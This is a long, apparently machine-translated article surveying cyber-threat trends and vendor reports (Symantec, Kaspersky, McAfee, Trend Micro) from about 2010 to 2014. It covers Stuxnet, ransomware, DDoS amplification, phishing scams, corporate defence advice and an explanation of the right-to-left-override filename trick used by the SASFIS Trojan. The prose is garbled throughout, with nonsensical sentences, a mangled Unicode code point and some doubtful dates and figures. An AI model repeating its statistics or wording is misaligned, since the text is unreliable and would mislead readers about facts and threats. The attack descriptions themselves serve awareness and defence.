Theoretically the possibility of carrying out the similar attacks, for example, to the systems of power supply was known long ago, but nobody heard about their implementation until there was cracking using the net worm of Stuxnet. This worm can infect the equipment of SCADA and enter into the system of change, directly influencing operation of the physical equipment.

At the moment represent to SCADA system a main objective of researches both for malefactors, and for specialists of security services as the modern malware has the broadest functionality and can effectively infect management systems for production process.

Malefactors will build in the malware of function of position fix of users that will allow to manage the attacks more precisely

The geolocation is one of primary subjects of discussion among security experts as the similar functionality of the software potentially violates human right on personal privacy. Such information can be used for tracking people and their habits.

In 2012 there will be a set of malware with geolocation opportunities thanks to which the attacks will become more purposeful. Simple opportunities of a geolocation in malware are used already now, allowing malefactors to select the purposes proceeding from location of users and selecting, thus, the most efficient methods of the attack for different regions of the world. It is expected that this year malefactors will use more actively possibilities of a geolocation to strengthen harmful impact of network attacks.

HTML5 standard will give to malefactors a set of opportunities for cracking of the Websites

For already many years the Internet represents the battlefield between hackers and users. In 2011 the majority of network attacks were aimed at Web applications therefore malefactors could steal terabytes of data.

Use of dynamic Web technologies, such as Web 2.0 and HTML 5, is one of pacing factors of increase in number of the attacks on Web applications. Dynamic Web technologies are extremely powerful and, undoubtedly, are very useful, but they have also a number of the shortcomings connected with vulnerability in a security system. They are used by almost all large Websites and also the largest suppliers of cloud computing. However if when developing Web applications it is wrong to use Web technologies and techniques of the protected coding, malefactors will have a set of opportunities for cracking and a bypass of protection of corporate networks. In 2012 the number of network attacks on Web applications will increase in tens of times.

Symantec: The cyber conflicts will become a norm

The Symantec corporation published in December, 2012 the forecast of trends in the world of cyber security for 2013. According to data of experts of corporation, in 2013 the attacks will become more aggressive and will be carried out not only for the purpose of earnings or espionage, but also for the purpose of demonstration of force of attacking. Besides, the number of threats for users of mobile and cloud computing and also for audience of social networks will increase.

The cyber conflicts will become a norm

Since 2013, the conflicts between the states, the organizations and individuals substantially will pass into a cyberspace. Online espionage differs in high success at extremely low degree of provability. The governments, as well as different organized groups of persons, will continue to use cyber attacks to damage or destroy confidential information or financial resources of the opponents. In 2013 we will become witnesses virtual "a potryasaniye weapon" when the governments, the organizations or even groups of persons use cyber attacks, with the purpose to show the power or to declare oneself.

Experts of Symantec expect also growth of number of the directed attacks which purpose is the individual or the non-governmental organization upholding, for example, certain political views or being the representative of minority in this or that conflict. Recently we meet such attacks in situations when the behavior of certain people or the organizations becomes a subject of discontent of this or that group of "haktivist".

Programs racketeers succeed pseudo-antiviruses

While the prevalence of pseudo-antiviruses slowly comes to naught, on open spaces of a cyberspace even more tough types of threats appear. Around the world gain popularity, so-called, ransomware (from engl. ransom – the redemption), the programs racketeers quite popular in Russia.

In spite of the fact that such "business model" was already used and earlier, she suffered from the same shortcomings, as this stealing: there was no convenient method to take away money. But thanks to development of the systems of online payments malefactors solved this problem.

Locks will be beyond simple racketing and will is directed to intimidation, i.e. cyber-bullying (cyber-attack for the purpose of causing psychological harm). Next year criminals will reach new level, influencing emotions of the victims, using methods after which it will become much more difficult to recover a system.

Mobile advertizing will complicate a situation

Mobile advertizing software (madware, mobile advertizing software) is a trifle which can not only strongly interfere with process of use of the device, but also issue to malefactors of a part of your location, a contact information and also identification these devices. The madware program which is imperceptibly getting on the device when installing the third-party application often begins to fill up the user with pop-up windows, creates labels, changes settings of the browser and collects its personal data. Only for the last nine months the number of the applications including the most aggressive types of madware-programs increased by 210%. Data on location and characteristics of the device can be justly purchased by Internet advertizing aggregators to provide more relevant advertizing. Experts of Symantec expect to see growth of use of programs of this kind in connection with desire of the companies to increase income due to mobile advertizing. Here also more aggressive and potentially harmful method of monetization of "free" mobile applications enters.

Monetization of social networks will create new dangers

Specialists of cybersecurity note that users with great trust treat social networks, beginning from exchange of personal data and finishing with purchase of game currency and virtual gifts to friends. As for the purpose of increase in level of monetization, social networks give to users the chance to give each other these gifts, growth of money turnover on social networks gives to malefactors new opportunities for implementation of the attacks.

Experts of cybersecurity of Symantec expect growth of number of the attacks directed to theft of payment data on social networks and deception of users with the purpose to force them to report these and other data to counterfeit social networks. Here false notifications on gifts and the e-mails requiring from the user to specify the home address and other personal information can enter. And though providing non-financial information can seem case harmless, malefactors trade and exchange it, integrating data with already available that often allows them to get access to really valuable information.

Malefactors will follow users to mobile and cloud computing

Malefactors will go there where users, and at the moment it is cloud and mobile computing. Cloud and mobile platforms will become the purpose of malefactors in 2013. Rapid growth of number of malware for Android OS in 2012 supports this forecast.

Besides, inclusion in corporate networks of the unprotected devices collecting information which settles after that on other cloud carriers considerably increases risk of leak or purposeful capture of data. Installation by users of new applications, eventually, inevitably leads everything to infection.

Some harmful mobile programs duplicate functionality of already earlier existing threats, for example those that steal information from devices. However also something new sometimes appears. For example, at the time of dial-up of modems there were programs which called on 900 numbers belonging to hackers. Today malware send paid SMS messages, and malefactors get proceeds. In 2013 it will be possible to observe further development of mobile technologies that will create new opportunities for kiberpristupnik.

The technology of e-wallets eWallet gaining popularity it will become inevitable one more platform which malefactors will try to use in the purposes. And in process of universal implementation of technologies of mobile payments, mobile devices will begin to be still of great value. By analogy with threat of Firesheep for interception of strangers of Wi - Fi - sessions, it is worth expecting emergence of programs which will intercept payment information of users. Some payment systems are widely popular among technically unsophisticated users and can have the vulnerabilities which are potentially leading to theft of information.


Increase in number of date leaks, losses of devices and how to take care of the future

Personal data about 1.1 million people - average result of each successful attack in 2011. Here sharp growth in comparison with previous years is observed. Such incidents were serious threat, in 2011 data on 187 million people were stolen. However the most frequent reason of date leaks - theft or loss of the notebook or other data medium, for example, the smartphone, a flash disk or the carrier with the backup copy. As a result of similar leaks data about 18.5 million people were opened.

As sales of tablet computers and smartphones continue to overtake sales of the PC, every year they will bear more and more confidential information. Employees bring own smartphones and tablets and connect them to corporate systems still before the organization managed to implement means of protecting and data management devices. It can lead to increase in number of date leaks as in the absence of due protection loss of mobile devices provides risk for stored on them information. The recent research of Symantec company shows that 50% of the lost phones will not be returned to owners and in 96% of cases (including on returned) there will be a date leak.

Mobile threats subject to blow business and individual users

In 2011 the number of mobile vulnerabilities grew by 93%. At the same time growth of threats for the Android system is noticed. With growth of number of vulnerabilities for mobile devices malefactors not only adapt the existing malware for mobile devices, but also create the specialized malware using all possibilities of the mobile platform. In 2011 mobile viruses for the first time posed a real threat for business and individual users. These threats are intended for data collection, transfer of content and tracking of users.

Kaspersky Security Bulletin: The rating of the countries on the Internet surfing security level

Experts of Kaspersky Lab prepared the traditional annual report on cyberthreats earlier - Kaspersky Security Bulletin 2011. Among the most indicative digits – a risk degree of infection to which computers at web surfing in the different countries of the world are exposed it was specified in the report.

Analysts made the rating of the states, most dangerous to Internet surfing, which leader at the end of 2011 was Russia: more than 55% of unique Internet users in the country were exposed to the web attacks.

Rating of the countries, most dangerous to Internet surfing 

Source: Kaspersky Lab, 2012

Yury Namestnikov, the author of the statistic report, noted that statistics of collision with cyberthreats at web surfing "shows the level of aggression of the environment in which the computer works". In 2011 this indicator grew in general on the world by 2% and made 32.3%.

Experts noted that in 2011 there were significant changes in top three. From the third Russia (+2.2%) rose to the first place. The second place remained beyond Oman with an indicator of 54.8%. The USA with 50.1% rose to the third place from the fifth position. In a year the risk level considerably decreased at web surfing in Iraq — from 61.8% to 45.4%. This country fell from the first line of rating by the eighth.

After the third place in "ten" the countries, most dangerous to Internet surfing, were distributed as follows: Armenia, Belarus, Azerbaijan, Kazakhstan, Iraq, Ukraine, Guinea-Bissau.

All countries which got to rating, Kaspersky Lab ranges on an infection risk degree at surfing on the Internet. "Group of the increased risk" with result of 41-60% 22 countries led by Russia treat. With indicators of 21-40% 118 countries, including Italy (38.9%), the UAE (38.2%), France (37%) got to Risk group.

It is possible to rank 9 countries as "Group of the safest at surfing on the Internet of the countries" (0 - 20%): Ethiopia (20.5%), Haiti (20.2%), Denmark (19.9%), Niger (19.9%), Togo (19.6%), Burundi (18.6%), Zimbabwe (18.6%), Benin (18.0%), Myanmar (17.8%). Germany, Japan, Luxembourg, Austria and Norway, whose indicators in 2010 varied from 19% to 20%, passed into risk group.

Except for Denmark, the group of the safe countries almost completely consists of beginners of rating – the developing countries of Africa and Asia. Their getting into this group was explained by the nature of distribution of files in these countries: the Internet is still not really well developed there, and for file sharing different removable mediums are actively used.

The countries Top-20 by the number of the malware placed on resources

According to Kaspersky Lab, in 2011 for carrying out 946,393,693 attacks on the Internet malefactors used 4,073,646 domains. Servers on which the malicious code was placed were detected in 198 countries of the world. 86.4% of all recorded harmful hostings were posted online in Internet space of twenty countries. From them 14.6% of all attacks were the share of Russia: this second place after the USA. Further on number of the outgoing attacks the Netherlands, Germany, Ukraine, China, Great Britain and others follow.

Source: Kaspersky Lab, 2012

Researchers noted that in spite of the fact that the first two positions were taken then by the same countries, as a year ago, the active growth of a share of harmful hostings which was fixed in these countries in previous years stopped. It was promoted by active actions of law enforcement agencies for closing of botnets. However in spite of the fact that the percent of harmful hostings in these countries decreased a little, it still remains at very high level, experts said.

The rating of the countries on readiness to a cyber to threats

In the world Sweden, Finland and Israel are called the countries which are the most prepared for cyber attacks. It was stated in the research McAfee Security & Defence Agenda (SDA).

In you will swell the rating of 23 countries in terms of their readiness to reflect a threat cyber, the maximum assessment of rating – 5 stars is given – this year did not get to anybody. On the second place after leaders there were eight countries, including the USA, Great Britain, France and Germany, they received 4 stars.

In 3.5 stars Australia, Canada, Japan and Austria got assessment, 3 stars were received by Italy, China, Poland and Russia. On 2.5 stars – Brazil, India and Romania. Mexico was the last – only 2 stars.

Top-23 the world countries on level security cyber

Source: McAfee, January, 2012 

According to Fillis Shnek (Phyllis Schneck), the technical director of McAfee, "the dobra is angrily much quicker" and for this reason any of the countries did not manage to receive the highest mark.

As for Russia, it is very difficult for most of experts to abstract from its reputation of "the country which is engaged a cyber in espionage". In October, 2011 officials of Contras of terrorist committee of the USA, addressing the Congress, said that Russia represents "permanent threat of economic safety of the USA". According to one of experts, "Russia is the country of bandits with great hackers".

Vladimir Chizhov, the permanent representative of Russia at the European Union, then criticized this position. "This type of threats can be performed successfully only based on the international cooperation", - he said.

Meanwhile, in the report it was said that some efforts of Russia on regulation of the sphere a cyber of security have positive effect. These are new legal acts in personal data protection, development of the digital signature and also change of registration procedure of domain names (earlier it was performed without any verification).

2010: Data of Symantec

For 2010 Symantec detected more than 286 million new threats. Such huge number of threats was followed by emergence of several new important trends. First, in 2010 sharp growth, both the frequency, and refinement of the directed attacks to the enterprises was observed. Secondly, social networks began to be used by malefactors as platforms for distribution of the attacks. Thirdly, forwards changed tactics - all of them began to use vulnerabilities of Java for cracking of traditional computer systems more often. At last, the sharp growth of interest of swindlers in mobile is noticed [34]

Year of the directed attacks

The directed attacks, such as Hydraq and Stuxnet, posed the growing threat for the enterprises in 2010. For successful and imperceptible penetration into computer networks of the enterprises malefactors used earlier unknown vulnerabilities (so-called vulnerabilities of zero day). And, for example, Stuxnet for implementation atakispolzovat four such vulnerabilities at once.

In 2010 malefactors attacked a number of various large multinational corporations and government agencies and also surprisingly there are a lot of small companies. Often malefactors collected information on specific staff of the attacked corporation, and then developed individulny approach to the specific victim (generally using methods of social engineering) for gaining access to network of the company victim. Thanks to such aim character, many of these attacks achieved success even in the relation of such organizations where the main security measures were observed.

The widely publicized directed attacks of 2010 aimed at plunder of intellectual property or causing physical damage. However many less known directed attacks were aimed also at individuals for gaining access to their personal information. According to the report, on average in 2010 one successful cracking led to hit in open access of personal data of 260,000 people.

Social networks: fertile soil for cyber crime

The popularity of social networks continues to grow, and creators of malware could not disregard it. Most often malefactors use the short URL addresses which are usually applied to reduction of number of characters in the message on the same Twitter, accurater type of the long link on the website or in the letter. In 2010 swindlers distributed millions of such links on social networks with the purpose to entice users on phishing sites or to infect with a virus or other malware. It provoked growth of quantity of cases of successful infection.

In the report it is noted that malefactors used possibilities of news feeds of popular social networks for mass harmful activities to the maximum. The typical scenario looked so: the malefactor enters on the hacked account in social network and hangs out the short link to the harmful website in the status. Then the website of social network automatically sends the link to news flows of friends of the victim, extending it thus to hundreds or thousands of the victims within several minutes. The Symantec corporation recorded that in 2010 65% of malicious URLs in news flows were used by the short URL addresses. From them for 73% clicked more than 10 times, and 33% – from 11 to 50 times.

Ready tools for implementation of the attacks were focused on Java

Sets of exploits for the attacks are computer programs which can be used by both advanced hackers, and beginners for simplification of start of the large-scale attacks. Such instrumemnta were everywhere applied in 2010 and even more often used vulnerabilities of Java to which share 17% of all vulnerabilities of plug-ins of web browsers in 2010 fell. Being the popular multi-platform technology which is not tied to type of the browser, Java remains an attractive target for malefactors.

Phoenix became a basis for the majority of the performed web attacks in 2010. It, as well as many other sets, contains the elements using vulnerabilities of Java too. For the reporting period top-6 the web attacks used expoyta to vulnerabilities of Java.

The number of the web attacks which are daily fixed in 2010 increased by 93% in comparison with 2009. And, considering that according to Symantec two thirds of all these threats were created using ready tool kits, they could become the reason of such sharp growth.

The scheme of actions of malefactors in mobile space clears up

Universal distribution of mobile platforms reached that level when malefactors cannot but just pay to it attention. With respect thereto Symantec expects increase in number of the attacks on these platforms. In 2010 mobile devices were attacked by mainly Trojan programs masking under legitimate applications. And though some of these programs were developed by malefactors "from scratch", in many cases infection of users happened by description of harmful algorithms in initial official applications. Then malefactors distributed these infected applications through public online stores. For example, authors of Pjapps Trojan in such a way used.

In spite of the fact that the new architecture of security systems used in modern mobile devices do not concede in efficiency to desktop koppyyuter and servers, malefactors often manage to pass this protection, using internal vulnerabilities of mobile platforms. Unfortunately, such defects meet quite often: during 2010 the Symantec corporation detected 163 vulnerabilities which could be used by malefactors for receiving partial or full control over the devices using popular mobile platforms. Within the first months 2011, malefactors already used these defects to infect hundreds of thousands of devices.

Landscape of threats – the Main digits and the facts

  • 286 million new threats – 2010 was characterized by variety of the malware and also emergence new mechanisms of its distribution that caused the further growth of amount of harmful technologies. In 2010 Symantec faced more than 286 million unique versions of the malware;
  • The number of the web attacks grew by 93% – Blyagodar to ready tools for implementation of the web attacks, their number increased in 2010 by 93%. It was also promoted by wide use of services of short URL;
  • Of "the human victims" for one successful attack – Such is the average number of people, whose personal data turned out 260,000 in open access after cracking in 2010;
  • 14 new vulnerabilities of zero day – vulnerability of zero day played a key role in the directed attacks, such as Hydraq and Stuxnet. Only Stuxnet used four different vulnerabilities of zero day;
  • 6,253 new vulnerabilities – In 2010 Symantec documented more vulnerabilities, than during any previous reporting period;
  • The number of the detected mobile vulnerabilities grew by 42% – growth of number of the recorded new vulnerabilities of mobile operating systems with 115 in 2009 to 163 in 2010 became Sign that cybercriminals begin to be focused on mobile space;
  • 1 botnet from more than 1 million spam bots – In 2010 was the period when under control of Rustock, the largest botnet from observed in 2010, there were more than one million bots. Other botnets – such as Grum and Cutwail – lagged behind not much more, controlling many hundreds of thousands of bots everyone;
  • 74% of spam belonged to pharmaceutical products – In 2010 about three quarters of all spam represented advertizing of pharmaceutical medicines;
  • $15 for 10,000 bots – Carrying out monitoring of advertisements of the shadow market in 2010, found out Symantec that 10,000 bots were on sale for only 15 US dollars. Usually bots are used for spam mailings and distribution of false software, however recently even more often apply them to DDoS attacks.
  • From $0:07 a.m. to $100 for the credit card – In 2010 the prices of details of credit cards at underground forums varied with the broad range. The rarity of the card and a discount at wholesale purchase were the factors dictating the price.

Measures against cybercriminals

Effectively to resist to this threat which scales so strikingly grew in recent years to the companies it is necessary to consider information security as one of key components of the operating activities. The question of responsibility should become the most priority. So far as the problem of information security purchased strategic importance, board members of the company should pay paramount attention to the solution of this difficult task.

Introduction to an organization structure of the company of a position of the Chief information security officer should become one of the first important steps. The Chief information security officer or the head of security, as a rule, do not join the board, but they should have the right of direct access and report either just before board, or to the official who is in hierarchy of subordination at most one step below than board. The Chief information security officer is obliged to inform upper managers on importance of measures for information security support and to try to obtain selection of necessary resources. The following decision made at the level of board of the company is a drawing up the list of data and systems which protection has paramount value. After determination of the divisions and systems needing protection scenarios of counteraction to the attacks taking into account the list of potential malefactors, their purposes, time and financial resources are developed. Along with it, after risks assessment it is necessary to implement an information security management system.

It is important that all departments were properly involved in work at all listed stages. One more essential moment – information work among personnel of the organization. It is necessary that each employee owned basic knowledge in information security field – in this case it will be possible to counteract at least the simplest tricks which are often used by malefactors, it, for example, as mailing of malware in attachments to e-mails. Technologies alone still are not enough; their role is only in helping people with adoption of the correct solutions and commission of the correct actions.

Install the firewall

Everyone (including small) firm should have the firewall limiting access to its network. It is your first line of defense.[35]

Provide access control

Use of the Internet by employees of office should be controlled carefully. Besides, the organizations should have the gateway of antivirus protection and content filtering which will become their second line of defense.

You carry out regular inspections

Network administrators or managers should monthly or at least once in a quarter again verify all user accounts and access rights to data.

Do not forget about physical protection

Protection is not limited only to data in the computer. The organizations should provide physical protection of the equipment also. Someone from personnel should accompany all visitors of your office, and screens of monitors should not be available to a review from a corridor.

Passwords should be reliable

The organizations should provide the choice of reliable passwords; it means a certain level of their complexity and periodic change. The password from a maiden name of mother is no good.

Do not stint!

If you can afford it, employ in staff of the specialist(s) in data protection. Besides, it is necessary to provide money for the equipment and software for protection against cybercriminals in the budget.

You learn personnel of vigilance

Personnel of office it is necessary to learn to be vigilant. Several simple rules can significantly increase security in your company: never go directly to the unknown website which address is sent you in mail, delete any doubtful letters and never click the links sent you. Instead it is necessary to carry out search via Google in this subject and already from there to try to find the website necessary to you.

Complex approach

Many techniques applied earlier at attacks on home users began to be used also concerning business now. It and the modified bank Trojans who are aimed at the staff of finance divisions and accounting, and different programs encoders which began to work within corporate information networks. Besides, the popularity was received by net worms whose removal requires a stop of work of all corporate network. When the companies having many branches located in different time zones face a similar problem, the network functioning stop inevitably leads[36] to financial losses[37].

According to results of the research conducted by Kaspersky Lab in 2014 among cybersecurity specialists, most often the Russian companies face the malware, spam, a phishing. Separately It should be noted internal threats among which the most serious problems cause vulnerabilities in the set software and also accidental date leaks because of employees and work of insiders.

Do not trust "kings" of social engineering

Will not protect any technical means from use of methods of social engineering. Hackers collect data, having armed with knowledge of human psychology. They send on social networks malicious URLs to new composition of favourite band or send to the accountant the letter with the "reconciliation statement" application in which the virus is actually latent.

The separate direction in this area it is possible to mark out so-called "Nigerian spammers". They send letters with a request for the help in the banking activities connected with money transfer, which are allegedly taxed with a big tax announce the recent death of very rich person "with the same surname" as they at the receiver of the letter, and suggest to assist in receiving money from the bank account deceased.

The only counteraction to such attacks – complete ignoring the message. Even if the user enters into a correspondence to such hacker only to write failure, then thereby he confirms the address of the e-mail. Afterwards malefactors can use it for other, more smart mailings.

For opposition to the attacks by methods of social engineering regular training of all staff of the company in safe work helps with the Internet and informing them about the existing types of threats.

Protection against DDoS attacks, viruses, trojans and phishing

The number of powerful DDoS attacks promptly grows. Similar hacker attacks can "put" the website of the company for long time and deprive of its owner of income. So, in a research of Arbor Networks company it is said that in the first half of 2014 over 100 incidents with power more than 100 GB / page are recorded. The number of the attacks of range more than 20 GB / with in the II quarter exceeded an indicator twice for all last year.

Same confirm data of Kaspersky Lab which in the spring of 2014 recorded new jump of power of DDoS attacks in Runet. In the spring the group of malefactors organized the serious attack, having selected the purposes several websites of the leading Russian banks, large companies and public institutions at once. Then the average power of the attack was 70–80 GB / with, and at the peak moments exceeded 100 GB / page. These indicators became a record for Runet — everything a year ago the most powerful DDoS attack in the Russian network segment did not exceed a threshold in 60 GB / page.

Significant increase in power of DDoS attacks happened thanks to distribution among malefactors of a new method – NTP Amplification. Its advantage is the essential gain amount (up to 556 times) that allows hackers to reach quickly the high power of the attack at the minimum efforts. For comparison, the attacks which made a noise a year ago were made by the DNS Amplification method which gain amount is 10 times less – to 54 times. Besides, Amplification allows malefactors to hide the this address that complicates their identification.

Ensuring protection against DDoS attacks with own forces – a difficult task for large business and SMB, almost very heavy for sector. The company should have necessary resources, both human, and material: two profile specialists for work by turns, the expensive equipment and connection to high-speed links of communication. At the same time it is necessary to consider that DDoS is not permanent threat, it is necessary to be ready to the fact that the equipment will stand idle, and work of specialists will not be demanded. Therefore it becomes often more profitable to use services of the third-party companies specializing in protection against the similar attacks, having connected to cloud services.

To owners of the PHP websites

For resource protection of the companies it is important to businessmen to remember that, the most unsafe websites, according to a fresh research of Positive Technologies company, are written in the PHP language as 76% from them contain critical vulnerabilities. Less vulnerable were web resources on Java (70%) and ASP.NET (55%).

Respectively, to the websites, the most subject attacks, it is necessary to treat the level of the security more attentively. For example, it is worth enhancing security from selection of identifiers or passwords of users (the attack by Brute Force method).

Signed certificates

Administrators of corporate network should control what applications employees use and what websites they visit – they should have valid (valid or signed) certificates of SSL. These certificates are divided into three types of validation – the confirming only domain name, the domain and the organization and also certificates with expanded check. The best option is a certificate with expanded check which has so-called "green bar". At an input on the website where such certificate is set, in an address bar of the browser of the visitor there will be a green line with the name of the organization which received the certificate.

Last time the threat to users of IT products with non-valid SSL arose when in online stores Google Play and Amazon at least 350 mobile applications with vulnerability to the attack of man-in-the-middle were revealed ("the person in the middle"). During such attack the hacker, having connected to the channel between partners, can catch the transmitted data. For example, the hacker can intercept data of credit cards of users which use the mobile applications assuming electronic payments.

Be on the alert

Though technologies also raise the computer security level, it is impossible to forget about vigilance, for example, at a receipt of letters by e-mail. Hackers are often covered with messages from tourist services, like Airbnb,, write on behalf of airlines, inform the user that the plane ticket was paid with his credit card, and offer the link to a phishing site where it is allegedly possible to find information on the forthcoming flight.

In September, 2014 in plots of "Nigerian" letters "Kaspersky (earlier Kaspersky Lab)" noted references of inhabitants of Africa sick with Ebola virus and unusual invitations to a conference of the World Health Organization (WHO). The purpose of swindlers, as usual, the trustful receivers who entered into a correspondence to authors of letters had a vymanivaniye of money.

In October, 2014 the turn of cybercriminals who used the hype around Ebola virus for mailing of harmful letters came. And again as the sender WHO was specified. Malefactors tried to convince the receiver of the text of the letters detected by experts that WHO prepared the file with general information and precautionary measures which will help to secure the user and people around against a fatal virus and other diseases.

In addition to operation of subjects, relevant for society, spammers send also the false receipts from online stores which are making out a bill for perfect purchase which will manage to be cancelled only on a phishing site. Statistics of attempts of a phishing does not console: according to the Antifishing system developed by Kaspersky Lab, the number of operations was nearly 19 million according to the results of only one September, 2014.

In modern conditions the companies need to use a complex program and hardware which would allow to provide the acceptable level of security of infrastructure with preserving of sufficient efficiency of business processes. Among these tools: antivirus software, intrusion prevention systems, firewalls, modules of control of devices and Internet access, an encryption system of data, mobile device management, means for protection of mail servers and the systems of collective work and so on.

Besides, it is important to remember that providing Information Security does not come to an end only with implementation of means of protecting, it is also necessary to conduct regular training of employees in rules of safe work with information electronically, to implement correct politicians and governed during the work with confidential data. It is important to users to remember golden rules: not go according to doubtful links, think out difficult passwords for accounts, not open investments in letters and, certainly, to put a comprehensive protection on the computer.

Main types of Internet threats

Rates of the innovative development at such competition of "offensive" and "defensive" technologies are very high. Every day more than 100 thousand new samples of the malicious software are developed. The amounts exceeding one million dollars are now paid for some harmful software modules. Cybercriminals are ready to pay such money because they are sure: invested funds will be able to pay off very quickly.

One more threat of information security is posed by the new race of arms unrolled in a cyberspace during which both acts of sabotage, and cyber attacks are carried out, in particular. Information on the world's largest intelligence program of PRISM which became recently public significantly undermined confidence to the large providers of cloud services who are based in the USA. Especially the trust in the countries of Europe where much attention is traditionally paid to data protection decreased. According to the expert and analytical organization InformationTechnologyandInnovationFoundation (Washington, the District of Columbia) which are based in the USA providers of cloud services can as a result from 2014 for 2016 receive less revenue for the amount from 22 to 35 billion US dollars.

Spam — along with traditional advertizing mailings, exists the harmful spam, for example, containing spyware or spam enticing users on the websites with harmful content.

The target phishing — unlike spam, a target phishing is directly aimed at narrow user groups and contains the messages with a social context urging the potential victim to open the executable file or to pass the containing malicious code to the website.

The PDF attack — lately in documents of the PDF format the set of serious vulnerabilities was revealed.

Poisoning of SEO (Search Engine Optimization) — threats of optimization of the search engine lead to the fact that the websites containing a malicious code are substituted on high places in the ratings of search systems when entering the request connected with the world championship. It is possible to be protected from such threats, using current versions of a lock antivirus and system of prevention, invasions.

Performance penalty — administrators can involve management systems for traffic or content filtering to limit or block access to online resources.

Social networks — analysts warn about the malware which can extend through popular social networks. Solutions of content filtering and blocking of files should be configured so that to minimize threats.

According to data IBM X-Force, the main source of threats still is such popular software as Internet browsers. Transfer of efforts of hackers from browsers to web applications through which it is possible to get access directly to the databases of the companies having special value became innovation of the attacks of the last years. The percent of elimination of vulnerabilities is steadily low — up to 60% of the vulnerabilities detected annually have no on the end of the year of special patches (patches) from software makers.

Accounts of privileged users, i.e. system administrators are subject to the greatest danger. Today control of actions of privileged users is a mandatory requirement from different standards and regulating authorities. Wrongful acts in their relation can be made as from the outside of the company, and the unfair employees. Growth of number of the threats related to privileged users is including insider threats when employees or consciously steal data from the company, or by negligence allow to make it another.

The scheme of fraud No. 419 revives under the name of FBI (according to Trend Micro company).

Computer criminals thought up one more method to draw attention of users. This time they issue themselves for the staff of the Federal Bureau of Investigation (USA) from Washington and make attempts of fraud through spam.

As in any other attempts of fraud, in this scheme the message sender of e-mail issues itself for the other person. The sender claims that he writes from FBI. The message contains information that to his receiver payment in the amount of $10.5 million is put. Then the swindler issuing himself for the employee of FBI allows the message recipient the instruction to address the chief of "management of Internet transfers" of United Trust Bank London bank. In the message it is specified that the mentioned chief — the only person making the decision on payment of this multimillion amount. Moreover, in the message it is specified that all receivers should follow accurately instructions for execution of the request for payment. Certainly, the message contains false information. The note at the end of the message looks especially ironically and demonstrates that cybercriminals are capable to take extreme measures in attempts to achieve success. In it the receiver is recommended to be careful of swindlers who can try to contact it. Not to fall a victim of similar fraud, it is always necessary to pay attention to the smallest parts in the received messages. One stare is enough to distinguish this message from counterfeit. It is necessary to get accustomed only.

Troyan uses SASFIS a new trick (according to Trend Micro company).

At the beginning of 2010 ill fame the Trojan SASFIS program sent in the counterfeit e-mail messages which are allegedly sent from the website of Facebook deserved. Infection of SASFIS involves installation of a huge number of other malware because this family of the malware does systems vulnerable to the attacks of botnets, especially ZeuS and BREDOLAB, and is connected with different options of counterfeit antiviruses, as a rule, with those that treat the pornographic websites.

Engineers of TrendLabsSM detected new SASFIS option where the right-to-left override method (RLO) representing inverting of Unicode of the text which was popular among spammers earlier is used, but now began to be applied as new tactics of social engineering.

The Trojan SASFIS program extends through spam in the form of the.RAR application with the.XLS file inside. After extraction the.XLS file looks as the typical document MS Excel. Actually, it is a screen saver which is identified as TROJ_SASFIS.HBC. This Trojan program activates the BKDR_SASFIS.AC program which allows to implement harmful branches in normal process of svchost.exe. Though the file also looks as the document Excel, it contains binary heading Win32 which only executable files have. The real name of the file (except for the Chinese characters) looks so: phone&mail). [U+202e } slx.scr, where U+202e ― control character of Unicode which gives a system a command to interpret the subsequent characters from right to left. Thus, for users the file name will look so: phone&mail).xls.scr. It will force them to believe that it is really the Excel file and therefore it is "safe" to open it. Though in reality it is the executable file of.SCR.

This method allows for the same purposes to use also other names of files, for example BACKS[U+2020e] FWS.BAT and I-LOVE-YOU-XOX[U+2020e] TXT.EXE which masks under BACKSTAB.SWF and I-LOVE-YOU-XOXEXE.TXT. In the first case the batch file masks under the Adobe Flash file; in the second case ― the executable file masks under the text file.

Users can apply the checked protection methods to prevention of this attack: not open suspicious e-mail messages and not load the application with executable files.

History of large incidents

  • September, 2003. The trojans sent from the Chinese provinces fell upon Taiwan and damaged networks of ten private companies.

  • In April, 2007 the Minister of Foreign Affairs of Estonia Urmas Paet accused Russian authorities of the hacker attacks which paralyzed work of the exchange, hospitals, the websites of public institutions and mass media.

  • From the same network addresses which were used against Estonia attacks on computer systems of oil pipelines of Georgia in August, 2009 were made.

  • In January, 2010 Google accused China of espionage through mail accounts of journalists and dissidents.

  • According to the British media (February, 2012), the Russian hackers sell account numbers and passwords from payment cards of a large number of residents of Great Britain. Data of the British are on sale on the Russian Websites for 30 dollars.

Information of residents of Great Britain became available after the Russian malefactors created the database on the Internet. For the amount of 300 dollars hackers also offer access to the existing bank account in Great Britain with a credit limit to 13 thousand dollars. Malefactors perform plunder of confidential information by means of mailing of malware on computers of users. In addition, swindlers also connect special devices which read out information from credit cards of the victims in shops and restaurants. After plunder data are transferred to empty cards with which it is possible to pay off in those countries which do not use new technology of identification of authenticity of means of payment via the built-in microchip and also in shops of electronic trading.

See Also


  1. Mobile adware: The Silent Plague with No Origin
  2. Kaspersky detected 1.3 thousand of malware with the name of services of video conferences
  3. Beware scams exploiting coronavirus fears
  4. Visa: Gas Station Networks Targeted to Steal Card Data
  5. Multiple hotels hit by targeted malware attacks
  6. Kaspersky report finds over half of Q3 DDoS attacks occurred in September
  7. of Fortinet 2019 Operational Technology Security Trends Report
  8. Hundreds of motel guests were secretly filmed and live-streamed online
  9. Hackers Made Half a Million Dollars Pretending They Watched You Watch Porn
  10. About of $1.2 billion in cryptocurrency stolen since 2017: cybercrime group
  11. U.S. Launches Criminal Probe into Bitcoin Price Manipulation
  12. Losses of owners of cryptocurrencies as a result of their thefts in 2018 are $1.36 billion
  13. * Cumulative damage for the five-year period from 2017 to 2022 James Moar; ruption/cybercrime-security/enterprise-threats-mitigation Juniper Research: The Future of Cybercrime & Security: Enterprise Threats & Mitigation (on April 25, 2017)
  14. ACRB the eleventh release of the report are given analysis results and trends in the field of cyber security for the last 12-18 months on the basis of research information and data obtained from the partner companies of Anomali, Lumeta, Qualys, Radware, SAINT and TrapX. The report also contains results of an annual research of solutions of security of Security Capabilities Benchmark Study (SCBS) prepared on the basis of questioning of 3600 executive directors on information security and information security support managers from 26 countries which answered questions of a cyber security status in the organizations.
  15. Trend Micro Security Predictions for 2018 Paradigm Shifts: Trend Micro Security Predictions for 2018
  16. Intelligence agencies of the USA: The Islamic State located in a cyberspace
  17. the Russian companies were equal to American on cyber security level
  18. Phiendish phisher gets phive years in phederal for of $2m phlights phraud
  19. TheShadowBrokers Monthly Dump Service – June 2017
  20. of OH LORDY! Comey Wanna Cry Edition
  21. Zcash
  22. Hacker Sentenced To 30 Months In Prison For Role In Largest Known Computer Hacking And Securities Fraud Scheme
